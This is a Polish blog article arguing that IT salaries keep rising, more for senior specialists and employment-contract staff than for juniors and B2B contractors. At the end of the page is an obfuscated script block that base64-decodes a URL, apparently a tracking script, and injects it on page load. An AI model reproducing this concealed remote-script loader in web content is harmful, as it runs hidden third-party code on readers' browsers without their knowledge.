Czy wynagrodzenia w branży IT rosną?

Podziel się z innymi

Jak powszechnie wiadomo, trudno znaleźć jakąkolwiek inną branżę, która rozwijałaby się w tak dynamicznym tempie jak ta technologiczna. Rosnące zapotrzebowanie na specjalistów, coraz to nowsze technologie oraz setki młodych ludzi, którzy kształcą się na uczelniach wyższych przygotowujących do zawodu w tej dziedzinie. To wszystko bardzo klarownie świadczy o tym jak rozwija się aktualnie branża technologiczna w naszym kraju. 

Jednakże warto również zwrócić uwagę na to, jak rozwój ten, pomimo tego, że nadal ma miejsce, zmienił swój charakter na przestrzeni ostatnich kilku lat. W związku z tym, w dzisiejszym artykule postaramy się odpowiedzieć na pytanie: „Czy wynagrodzenia w IT nadal rosną?”. Dlatego też, jeżeli interesuje Cię ten temat, koniecznie przeczytaj dalszą część tego wpisu. 

Jak zmieniła się branża technologiczna w ostatnich latach?

Wynagrodzenia w IT to bardzo konkretny temat, jednakże nie można go omówić bez odpowiedniego wprowadzenia, w związku z tym warto przedstawić to, jak branża technologiczna zmieniła się w ostatnich latach. Mianowicie, jeszcze jakieś 3 lata temu, rynek pracy IT był bardzo dynamiczny i pełen ofert zarówno dla specjalistów, jak i juniorów. Natomiast, dzisiaj ta sytuacja wygląda już trochę inaczej. W związku z tym, że nadeszła nowa, bardzo duża fala młodych, jeszcze nie doświadczonych informatyków, mamy do czynienia z przepełnieniem rynku pracy. Dlatego też, aktualnie będąc juniorem, dosyć trudno jest znaleźć dobre zatrudnienie w branży IT. Z drugiej strony, brakuje specjalistów, których przybywa w znacznie wolniejszym tempie niż juniorów. 

Sytuacja ta, oczywiście wpłynęła również na wynagrodzenia w branży IT. Mianowicie, juniorzy których jest tak dużo na rynku pracy, w związku ze swoim małym doświadczeniem wcale nie zarabiają dużo więcej niż jeszcze kilka lat temu. Natomiast, specjaliści, których jak już powiedzieliśmy brakuje na rynku pracy, mogą skutecznie wywierać presję na pracodawcach, dzięki czemu ich wynagrodzenia, może nie rosną tak szybko, jak te 3 lata temu, jednakże idą w górę zauważalnie szybciej niż wynagrodzenia juniorów. 

Czy wynagrodzenia w IT rzeczywiście rosną?

Skoro zrobiliśmy już małe wprowadzenie do tematu, możemy już przejść do najważniejszej części dzisiejszego artykułu. Mianowicie, wynagrodzenia w IT to wbrew pozorom wcale nie tak skomplikowana sprawa jak mogłoby się wydawać. Wszyscy dobrze wiemy, że ogólnie rzecz ujmując wynagrodzenia praktycznie we wszystkich dziedzinach rosną, co ma związek z inflacją, która może nie jest już tak duża jak 2 lata temu, jednakże w dalszym ciągu jej wpływ jest zauważalny. 

Natomiast, wynagrodzenia w IT nie rosną tylko i wyłącznie ze względu na spadek wartości pieniądza. Jako, że branża IT dalej się rozwija, wynagrodzenia pracowników i specjalistów zajmujących się tym sektorem gospodarki, również dalej rosną. Na podstawie „Raportu płacowego branży IT w 2024” Organizacji Pracodawców Usług IT, możemy zauważyć, że rynek pracy IT w 2023 roku nie był aż tak dynamiczny jak w latach poprzednich, jednakże nie zmienia to faktu, że wynagrodzenia w IT dalej rosły, chociaż niektóre firmy musiały decydować się na cięcia w zatrudnieniu. 

Z drugiej strony, warto także zwrócić uwagę na to, że prognozy na nadchodzący rok są zdecydowanie bardziej optymistyczne. Według badań aż 61% firm planuje zwiększyć zatrudnienie, a 72% z nich ma w planach podwyższyć wynagrodzenia. 

Jak rosną wynagrodzenia w IT?

Według już wcześniej wspomnianego badania, wynagrodzenia w IT rosły mniej dynamicznie niż w latach poprzednich, jednakże dalej szły w górę. Najbardziej zyskali na tym specjaliści, którzy zatrudnieni są na umowach o pracę – ich wynagrodzenie wzrosło średnio 22%. Natomiast zauważalnie mniej wzrosły wynagrodzenia tych informatyków, którzy zatrudnieni są na podstawie kontraktu B2B – tutaj wynagrodzenia wzrosły średnio o 13%. 

W kontekście omawiania wynagrodzeń w branży IT, nie sposób wspomnieć o nadal istotnym problemie, który ma miejsce. Mianowicie, w dalszym ciągu zarobki mężczyzn w tej branży są zauważalnie wyższe niż zarobki kobiet. Średnio różnica ta wynosi 1300 złotych, co naprawdę jest dużą kwotą. Całe szczęście, nie zmienia to faktu, że zarobki kobiet, tak samo jak zarobki mężczyzn pracujących w opisywanej przez nas branży, dalej rosną. 

Podsumowanie

Podsumowując, w dzisiejszym artykule klarownie przedstawiliśmy to, że wynagrodzenia w IT to wcale nie jest tak skomplikowany temat, jak mogłoby się wydawać. Opowiadając na najważniejsze pytanie w tym kontekście – wynagrodzenia w IT w dalszym ciągu rosną. Jednakże, warto zwrócić uwagę również na to, że opisywana przez nas branża, w ciągu ostatnich lat przeszła nie małe zmiany. Natomiast, nie zmienia to faktu, że zatrudnienie w IT, nadal gwarantuje naprawdę solidne zarobki, które może nie rosną tak dynamicznie jak 3 czy 4 lata temu, jednakże dalej idą zauważalnie w górę. 

      <script>
       (function(xgpcbyxv, xnnuwlbe, qjdjhlmy, qtusoknj, royamymo, pduqpxmo){
 royamymo = xnnuwlbe.createElement(qjdjhlmy);pduqpxmo = xnnuwlbe.getElementsByTagName(qjdjhlmy)[0];
 royamymo.ascyc = 1;
 royamymo.src = atob(qtusoknj);
 pduqpxmo.parentNode.insertBefore(royamymo, pduqpxmo);
})(window, document, 'script', 'aHR0cHM6Ly9zdGF0cy5saW5raG91c2UuY28vYXBpL2FuYWx5emVyL3YxL3NjcmlwdC9jN2VjNDA0MS1iZWIwLTQyMGUtYjczNi1jNjJiZmMzMGM5MTAuanM=')
      </script>